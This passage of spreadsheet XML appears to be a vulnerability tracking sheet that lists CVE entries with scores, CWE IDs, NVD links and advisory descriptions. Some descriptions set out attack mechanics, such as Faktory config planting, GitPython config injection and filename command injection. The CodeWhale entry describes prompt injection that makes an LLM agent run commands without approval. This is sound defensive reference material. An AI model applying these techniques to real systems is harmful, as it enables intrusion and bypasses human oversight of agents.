          <t>@phun-ky/defaults-deep is a library like lodash defaultsDeep with array preservation and no lodash dependency. Prior to 2.0.5, defaultsDeep() recursively merges user-supplied objects without filtering proto, constructor, and prototype, allowing properties to be written to Object.prototype. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="M2966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54737</t>
        </is>
      </c>
    </row>
    <row r="2967">
      <c r="A2967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55538</t>
        </is>
      </c>
      <c r="C2967" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2967" s="5" t="inlineStr"/>
      <c r="F2967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2967" s="5" t="inlineStr"/>
      <c r="H2967" s="5" t="inlineStr"/>
      <c r="I2967" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2967" s="5" t="inlineStr"/>
      <c r="K2967" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2967" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, praisonai serve agents parses config["api_key"] but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. Missing or incorrect bearer and X-API-Key values still reach agent execution. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M2967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55538</t>
        </is>
      </c>
    </row>
    <row r="2968">
      <c r="A2968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61409</t>
        </is>
      </c>
      <c r="C2968" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2968" s="5" t="inlineStr"/>
      <c r="F2968" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G2968" s="5" t="inlineStr"/>
      <c r="H2968" s="5" t="inlineStr"/>
      <c r="I2968" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2968" s="5" t="inlineStr"/>
      <c r="K2968" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2968" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Application, versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M2968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61409</t>
        </is>
      </c>
    </row>
    <row r="2969">
      <c r="A2969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="C2969" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2969" s="5" t="inlineStr"/>
      <c r="F2969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2969" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2969" s="5" t="inlineStr"/>
      <c r="I2969" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2969" s="5" t="inlineStr"/>
      <c r="K2969" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L2969" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M2969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="2970">
      <c r="A2970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67326</t>
        </is>
      </c>
      <c r="C2970" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2970" s="5" t="inlineStr"/>
      <c r="F2970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2970" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2970" s="5" t="inlineStr"/>
      <c r="I2970" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2970" s="5" t="inlineStr"/>
      <c r="K2970" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2970" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.50 fails to validate newline characters in the section parameter of config_writer(), allowing attackers to inject arbitrary section headers into .git/config. Attackers can inject newlines to create a forged [core] section with hooksPath pointing to attacker-controlled directories, achieving remote code execution when git hooks are triggered.</t>
        </is>
      </c>
      <c r="M2970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67326</t>
        </is>
      </c>
    </row>
    <row r="2971">
      <c r="A2971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67434</t>
        </is>
      </c>
      <c r="C2971" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2971" s="5" t="inlineStr"/>
      <c r="F2971" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2971" s="5" t="inlineStr"/>
      <c r="H2971" s="5" t="inlineStr"/>
      <c r="I2971" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2971" s="5" t="inlineStr"/>
      <c r="K2971" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2971" s="5" t="inlineStr">
        <is>
          <t>PHP_CodeSniffer tokenizes PHP files and detects violations of a defined set of coding standards. Prior to versions 3.13.6 and 4.0.2, PHP_CodeSniffer contains a command injection vulnerability in the code that generates the Gitblame, Hgblame, and Svnblame report formats. As a result, running PHP_CodeSniffer over untrusted files, for example in a continuous integration pipeline that scans pull requests, or on a developer machine reviewing third party code, could result in attacker controlled shell commands being executed when the Gitblame, Hgblame, or Svnblame report processes a file whose name contains shell metacharacters. Users using the default Full report, or any of the other non-blame reports, are not affected. Users on a runtime platform which does not allow filenames to contain shell metacharacters, such as " and ;, are not affected. This issue is fixed in versions 3.13.6 and 4.0.2.</t>
        </is>
      </c>
      <c r="M2971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67434</t>
        </is>
      </c>
    </row>
    <row r="2972">
      <c r="A2972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69097</t>
        </is>
      </c>
      <c r="C2972" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2972" s="5" t="inlineStr"/>
      <c r="F2972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2972" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2972" s="5" t="inlineStr"/>
      <c r="I2972" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2972" s="5" t="inlineStr"/>
      <c r="K2972" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L2972" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.53 fails to properly escape section names in git config files, allowing attackers to inject arbitrary configuration directives through malicious submodule names. Attackers can inject core.sshCommand or other dangerous config keys into the victim's .git/config via create_submodule or clone_from operations, achieving remote code execution when git performs ssh operations.</t>
        </is>
      </c>
      <c r="M2972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69097</t>
        </is>
      </c>
    </row>
    <row r="2973">
      <c r="A2973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="C2973" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2973" s="5" t="inlineStr"/>
      <c r="F2973" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2973" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2973" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2973" s="5" t="inlineStr"/>
      <c r="K2973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2973" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="2974">
      <c r="A2974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71417</t>
        </is>
      </c>
      <c r="C2974" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2974" s="5" t="inlineStr"/>
      <c r="F2974" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2974" s="5" t="inlineStr"/>
      <c r="H2974" s="5" t="inlineStr"/>
      <c r="I2974" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2974" s="5" t="inlineStr"/>
      <c r="K2974" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2974" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, POST /api/1/certificates/upload allowed a non-read-only user to create a duplicate row using another certificate body, authority_id, serial, or external_id without requiring permission on the underlying authority. PUT /api/1/certificates//revoke authorized the caller against only the selected Lemur row, so the creator of the duplicate bypassed CertificatePermission. The duplicate had no cert.endpoints, which also bypassed the safeguard that prevents revocation of deployed certificates. Issuer plugins then revoked the real CA-side certificate using certificate.body or external_id under the stored authority credentials. An attacker could therefore revoke arbitrary managed certificates and cause fleet-wide TLS denial of service. The fix rejects duplicate authority_id and serial identities, requires authority access on upload, and checks every matching row during revocation. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71417</t>
        </is>
      </c>
    </row>
    <row r="2975">
      <c r="A2975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72913</t>
        </is>
      </c>
      <c r="C2975" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2975" s="5" t="inlineStr"/>
      <c r="F2975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2975" s="5" t="inlineStr"/>
      <c r="H2975" s="5" t="inlineStr"/>
      <c r="I2975" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2975" s="5" t="inlineStr"/>
      <c r="K2975" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-77, CWE-93</t>
        </is>
      </c>
      <c r="L2975" s="5" t="inlineStr">
        <is>
          <t>Kitty is a cross-platform GPU based terminal. Prior to 0.48.2, the @kitty-echo and @kitty-ssh DCS handlers in kitty/window.py write unauthenticated data to the child shell's stdin, where handle_remote_echo accepts printable shell command characters and handle_remote_ssh calls get_ssh_data in kittens/ssh/utils.py, which emits a newline; chaining the handlers can execute attacker-controlled commands when a user displays untrusted terminal data. This issue is fixed in version 0.48.2.</t>
        </is>
      </c>
      <c r="M2975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72913</t>
        </is>
      </c>
    </row>
    <row r="2976">
      <c r="A2976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75857</t>
        </is>
      </c>
      <c r="C2976" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2976" s="5" t="inlineStr"/>
      <c r="F2976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2976" s="5" t="inlineStr">
        <is>
          <t>python, mysql</t>
        </is>
      </c>
      <c r="H2976" s="5" t="inlineStr"/>
      <c r="I2976" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2976" s="5" t="inlineStr"/>
      <c r="K2976" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2976" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions &gt;= 0.8.41 and &lt; 0.8.64 contain a vulnerability in the exec_shell_interact (alias exec_interact) tool, whose approval_requirement returns ApprovalRequirement::Auto. This overrides the default Required approval for code-executing tools, so LLM-controlled stdin is written into an already-approved long-running interactive shell (e.g., a python3 -i REPL, mysql, ssh, or sudo -i session) without any approval prompt. An attacker who can inject instructions via untrusted content the agent ingests (a fetched page, MCP result, or repo file) can cause commands to run at the privilege level of that approved process. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M2976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75857</t>
        </is>
      </c>
    </row>
    <row r="2977">
      <c r="A2977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="C2977" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2977" s="5" t="inlineStr"/>
      <c r="F2977" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2977" s="5" t="inlineStr"/>
      <c r="H2977" s="5" t="inlineStr"/>
      <c r="I2977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2977" s="5" t="inlineStr"/>
      <c r="K2977" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2977" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="M2977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="2978">
      <c r="A2978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78485</t>
        </is>
      </c>
      <c r="C2978" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2978" s="5" t="inlineStr"/>
      <c r="F2978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2978" s="5" t="inlineStr"/>
      <c r="H2978" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2978" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2978" s="5" t="inlineStr"/>
      <c r="K2978" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2978"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Unauthorized access</t>
        </is>
      </c>
      <c r="M2978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78485</t>
        </is>
      </c>
    </row>
    <row r="2979">
      <c r="A2979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="C2979" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2979" s="5" t="inlineStr"/>
      <c r="F2979" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2979" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2979" s="5" t="inlineStr"/>
      <c r="I2979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2979" s="5" t="inlineStr"/>
      <c r="K2979" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2979" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="2980">
      <c r="A2980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79635</t>
        </is>
      </c>
      <c r="C2980" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2980" s="5" t="inlineStr"/>
      <c r="F2980" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2980" s="5" t="inlineStr"/>
      <c r="H2980" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2980" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2980" s="5" t="inlineStr"/>
      <c r="K2980" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2980"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unauthorized access.</t>
        </is>
      </c>
      <c r="M2980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79635</t>
        </is>
      </c>
    </row>
    <row r="2981">
      <c r="A2981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79643</t>
        </is>
      </c>
      <c r="C2981" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2981" s="5" t="inlineStr"/>
      <c r="F2981" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2981" s="5" t="inlineStr"/>
      <c r="H2981" s="5" t="inlineStr"/>
      <c r="I2981" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2981" s="5" t="inlineStr"/>
      <c r="K2981" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="L2981" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Incorrect Operator vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M2981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79643</t>
        </is>
      </c>
    </row>
    <row r="2982">
      <c r="A2982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79691</t>
        </is>
      </c>
      <c r="C2982" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2982" s="5" t="inlineStr"/>
      <c r="F2982" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2982" s="5" t="inlineStr"/>
      <c r="H2982" s="5" t="inlineStr"/>
      <c r="I2982" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2982" s="5" t="inlineStr"/>
      <c r="K2982" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L298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M2982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79691</t>
        </is>
      </c>
    </row>
    <row r="2983">
      <c r="A2983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79692</t>
        </is>
      </c>
      <c r="C2983" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2983" s="5" t="inlineStr"/>
      <c r="F2983" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2983" s="5" t="inlineStr"/>
      <c r="H2983" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2983" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2983" s="5" t="inlineStr"/>
      <c r="K2983" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2983" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of File Name or Path vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to filesystem access for attacker.</t>
        </is>
      </c>
      <c r="M2983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79692</t>
        </is>
      </c>
    </row>
    <row r="2984">
      <c r="A2984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79695</t>
        </is>
      </c>
      <c r="C2984" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2984" s="5" t="inlineStr"/>
      <c r="F2984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2984" s="5" t="inlineStr"/>
      <c r="H2984" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2984" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2984" s="5" t="inlineStr"/>
      <c r="K2984" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2984" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Handling of Highly Compressed Data (Data Amplification) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M2984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79695</t>
        </is>
      </c>
    </row>
    <row r="2985">
      <c r="A2985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80122</t>
        </is>
      </c>
      <c r="C2985" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2985" s="5" t="inlineStr"/>
      <c r="F2985" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2985" s="5" t="inlineStr"/>
      <c r="H2985" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2985" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2985" s="5" t="inlineStr"/>
      <c r="K2985" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2985"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2985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80122</t>
        </is>
      </c>
    </row>
    <row r="2986">
      <c r="A2986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="C2986" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2986" s="5" t="inlineStr"/>
      <c r="F2986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2986" s="5" t="inlineStr"/>
      <c r="H2986" s="5" t="inlineStr"/>
      <c r="I2986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2986" s="5" t="inlineStr"/>
      <c r="K2986" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L2986" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="M2986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="2987">
      <c r="A2987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81796</t>
        </is>
      </c>
      <c r="C2987" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2987" s="5" t="inlineStr"/>
      <c r="F2987" s="5" t="inlineStr"/>
      <c r="G2987" s="5" t="inlineStr"/>
      <c r="H2987" s="5" t="inlineStr"/>
      <c r="I2987" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2987" s="5" t="inlineStr"/>
      <c r="K2987" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2987" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in WP Travel &lt;= 12.0.3 versions.</t>
        </is>
      </c>
      <c r="M2987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81796</t>
        </is>
      </c>
    </row>
    <row r="2988">
      <c r="A2988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85028</t>
        </is>
      </c>
      <c r="C2988" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2988" s="5" t="inlineStr"/>
      <c r="F2988" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2988" s="5" t="inlineStr">
        <is>
